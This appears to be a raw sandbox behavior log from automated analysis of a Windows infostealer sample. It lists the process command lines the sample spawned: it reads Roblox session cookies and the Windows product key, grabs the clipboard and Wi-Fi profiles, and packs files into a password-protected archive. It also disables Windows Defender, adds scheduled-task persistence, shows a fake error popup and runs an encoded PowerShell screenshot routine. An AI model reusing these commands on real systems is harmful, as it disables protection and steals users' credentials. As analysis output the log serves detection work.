                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\sB2ClgrGng.exe'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\bound.exe'Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\bound.exe bound.exeJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('System failed to install recent update. click ok to retry.', 0, 'Error', 0+16);close()"Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "word" /tr "C:\Users\user\AppData\Roaming\word.exe"
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeProcess created: C:\Windows\System32\shutdown.exe shutdown.exe /f /s /t 0
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tuy1nspn\tuy1nspn.cmdline"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESADCB.tmp" "c:\Users\user\AppData\Local\Temp\tuy1nspn\CSC4CC439E8542640B1AC30792EC9E3F11A.TMP"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exe a -r -hp"newgen" "C:\Users\user\AppData\Local\Temp\mVQsx.zip" *
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: python3.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: libffi-8.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: sqlite3.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: libcrypto-3.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: libssl-3.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: avicap32.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: msvfw32.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: dciman32.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: winmmbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: mmdevapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: devobj.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: ksuser.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: avrt.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: audioses.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: msacm32.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: midimap.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
                      Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeSection loaded: sspicli.dll
